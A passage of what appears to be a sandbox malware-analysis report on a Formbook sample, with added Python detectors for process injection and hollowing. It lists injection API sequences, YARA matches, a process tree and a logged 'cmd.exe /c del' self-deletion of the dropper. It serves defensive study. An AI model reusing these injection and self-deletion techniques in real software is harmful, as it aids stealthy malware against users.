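    r"Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A4AD30 NtSetContextThread,",
    r"Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49A20 NtResumeThread,LdrInitializeThunk,",
    r"Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49760 NtOpenProcess,",
    r"Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A4A770 NtOpenThread,",
    r"Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A49950 NtQueueApcThread,",
    r"Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A4B040 NtSuspendThread,",
    r"Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A4A3B0 NtGetContextThread,",
    r"Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_1_004181D0 NtCreateFile,",
    r"Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9760 NtOpenProcess,",
    r"Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045FA770 NtOpenThread,",
    r"Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F98A0 NtWriteVirtualMemory,",
    r"Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045F9950 NtQueueApcThread,",
    r"Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 0_2_004047D3",
]


def parse_rows(lines):
    """Group API names by process index: {proc: {"image": str, "apis": set}}."""
    procs = defaultdict(lambda: {"image": None, "apis": set()})
    for line in lines:
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # not a Code-function row, e.g. a Yara or string row
        rec = procs[int(m["proc"])]
        rec["image"] = m["image"]
        for api in m["apis"].split(","):
            api = api.strip()
            # LdrInitializeThunk is the loader entry the sandbox records as
            # the call path, not an API the sample chose; it carries no signal.
            if api and api != "LdrInitializeThunk":
                rec["apis"].add(api)
    return dict(procs)


def match_techniques(apis):
    """Names of every technique whose full API set is present, sorted."""
    return sorted(name for name, needed in TECHNIQUES.items() if needed <= apis)


def analyse(lines):
    """Per process: image path, distinct APIs seen, and completed techniques."""
    return {
        proc: {"image": rec["image"], "apis": sorted(rec["apis"]),
               "techniques": match_techniques(rec["apis"])}
        for proc, rec in parse_rows(lines).items()
    }


if __name__ == "__main__":
    for proc, rec in sorted(analyse(SAMPLE_ROWS).items()):
        print(f"process {proc} ({rec['image']}): {rec['techniques'] or 'no injection set'}")
```

Fed the full row list from this report, both process 2 (the hollowed PQMW0W5h3X.exe child) and process 4 (rundll32.exe, which the overview flags as started without a DLL) complete all three sets; the constructed subset above completes only the APC set for rundll32 so the difference in output is visible. The heuristic is deliberately strict (every API of a set must appear) to keep the false-positive rate down on benign loaders that touch NtWriteVirtualMemory alone.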
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 0_2_004047D3
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 0_2_004061D4
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_0040102E
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00401030
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_0041B8FB
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00408C6C
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00408C70
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_0041B57A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00402D88
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_0041C58A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00402D90
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A320A0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00AD20A8
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A1B090
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00AD28EC
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00ADE824
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00AC1002
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A24120
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A0F900
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00AD22AE
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A3EBB0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00ACDBD2
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00AD2B28
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A1841F
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00ACD466
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A32581
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A1D5E0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00AD25DD
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A00D20
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00AD2D07
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00AD1D55
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00AD2EF7
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00A26E30
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00ACD616
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_2_00AD1FF1
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_1_0040102E
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_1_00401030
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_1_0041B8FB
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_1_00408C6C
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 2_1_00408C70
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0467D466
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045C841F
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04681D55
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04682D07
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045B0D20
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_046825DD
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045CD5E0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045E2581
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045D6E30
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0467D616
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04682EF7
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04681FF1
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0468DFCE
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0468E824
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04671002
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_046828EC
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_046820A8
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045CB090
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045E20A0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045BF900
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045D4120
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0466FA2B
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_046822AE
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045DAB40
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04682B28
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0467DBD2
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_046703DA
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_045EEBB0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02C1B8FB
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02C02FB0
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02C08C6C
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02C08C70
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02C02D88
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02C1C58A
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02C02D90
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02C1B57A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: String function: 00A0B150 appears 35 times
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: String function: 0041A0B0 appears 38 times
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 045BB150 appears 48 times
          Source: PQMW0W5h3X.exe, 00000000.00000003.330860083.00000000098B6000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PQMW0W5h3X.exe
          Source: PQMW0W5h3X.exe, 00000002.00000002.382278358.000000000265C000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs PQMW0W5h3X.exe
          Source: PQMW0W5h3X.exe, 00000002.00000002.381909590.0000000000AFF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PQMW0W5h3X.exe
          Source: PQMW0W5h3X.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@14/8
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_01
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeFile created: C:\Users\user\AppData\Local\Temp\nsgB978.tmpJump to behavior
          Source: PQMW0W5h3X.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: PQMW0W5h3X.exeVirustotal: Detection: 17%
          Source: PQMW0W5h3X.exeReversingLabs: Detection: 21%
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeFile read: C:\Users\user\Desktop\PQMW0W5h3X.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PQMW0W5h3X.exe 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeProcess created: C:\Users\user\Desktop\PQMW0W5h3X.exe 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeProcess created: C:\Users\user\Desktop\PQMW0W5h3X.exe 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.355795813.000000000DD20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PQMW0W5h3X.exe, 00000000.00000003.330363976.00000000097A0000.00000004.00000001.sdmp, PQMW0W5h3X.exe, 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, rundll32.exe, 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PQMW0W5h3X.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: PQMW0W5h3X.exe, 00000002.00000002.382267305.0000000002650000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: PQMW0W5h3X.exe, 00000002.00000002.382267305.0000000002650000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.355795813.000000000DD20000.00000002.00000001.sdmp
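The process-creation lines above are the evidence behind three of the Sigma hits in the overview: the sample re-launches its own image with an identical command line (the first stage before hollowing), explorer.exe starts rundll32.exe with nothing but its own path (no DLL, no export), and that rundll32.exe runs cmd.exe /c del against the original file once the payload no longer needs it. The Python below is an added example, not code from the Joe Sandbox report or from the sample, that runs those three checks over constructed process-creation events mirroring this tree. The PIDs and the event field names (pid, ppid, image, cmdline) are assumptions.

```python
import re
from typing import Any, Dict, List, Tuple

Event = Dict[str, Any]
_TOKEN = re.compile(r"'[^']*'|\"[^\"]*\"|\S+")


def tokens(cmdline: str) -> List[str]:
    """Split a command line, keeping quoted paths whole (quotes removed)."""
    return [t.strip("'\"") for t in _TOKEN.findall(cmdline)]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[Event]) -> List[Tuple[int, str]]:
    """Apply three checks to a set of process-creation events."""
    by_pid = {e["pid"]: e for e in events}
    images = {e["image"].lower() for e in events}
    alerts: List[Tuple[int, str]] = []
    for e in events:
        toks = tokens(e["cmdline"])
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])

        # 1. rundll32.exe launched with nothing but its own path: no DLL and
        #    no export name (the "Rundll32 Without Any CommandLine Params"
        #    and "Process Start Without DLL" Sigma hits).
        if name == "rundll32.exe" and len(toks) <= 1:
            alerts.append((e["pid"], "rundll32 without DLL argument"))

        # 2. cmd.exe /c del <file> where <file> is the image of a process in
        #    this tree: the payload deleting the dropper after injection.
        if name == "cmd.exe":
            low = [t.lower() for t in toks]
            if "/c" in low and "del" in low and low.index("del") + 1 < len(low):
                target = low[low.index("del") + 1]
                if target in images:
                    alerts.append((e["pid"], f"deletes running image {target}"))

        # 3. A process re-launching its own image with the identical command
        #    line: the first-stage pattern that precedes process hollowing.
        if (parent is not None
                and parent["image"].lower() == e["image"].lower()
                and parent["cmdline"] == e["cmdline"]):
            alerts.append((e["pid"], "self-spawn with identical command line"))
    return alerts


SAMPLE_EXE = r"C:\Users\user\Desktop\PQMW0W5h3X.exe"

# Constructed events mirroring the report's process tree; the PIDs and the
# field names are assumptions, not values taken from the sandbox.
EVENTS: List[Event] = [
    {"pid": 7016, "ppid": 1000, "image": SAMPLE_EXE, "cmdline": f"'{SAMPLE_EXE}'"},
    {"pid": 7024, "ppid": 7016, "image": SAMPLE_EXE, "cmdline": f"'{SAMPLE_EXE}'"},
    {"pid": 3000, "ppid": 1000, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe"},
    {"pid": 7032, "ppid": 3000, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"C:\Windows\SysWOW64\rundll32.exe"},
    {"pid": 7040, "ppid": 7032, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": f"/c del '{SAMPLE_EXE}'"},
    {"pid": 7044, "ppid": 7040, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

if __name__ == "__main__":
    for pid, why in detect(EVENTS):
        print(pid, why)
```

Check 2 matches the deleted path against every image in the tree rather than only the parent's, because here the deletion is issued from rundll32.exe, two processes away from the dropper it removes; a rule keyed on the parent alone would miss it.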

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Unpacked PE file: 2.2.PQMW0W5h3X.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 0_2_10001D3B GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,lstrcatA,GetProcAddress,
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 0_2_100029F0 push eax; ret
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_004062F6 pushfd ; ret
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_0041B3C5 push eax; ret
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_004153FC push eax; retf
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_0041B47C push eax; ret
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_0041B412 push eax; ret
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_0041B41B push eax; ret
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00415CE7 pushad ; ret
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_0041C4EE push 133511A3h; retf
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00414D71 push ss; iretd
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00415D38 pushad ; ret
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_2_00A5D0D1 push ecx; ret
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe Code function: 2_1_004062F6 pushfd ; ret
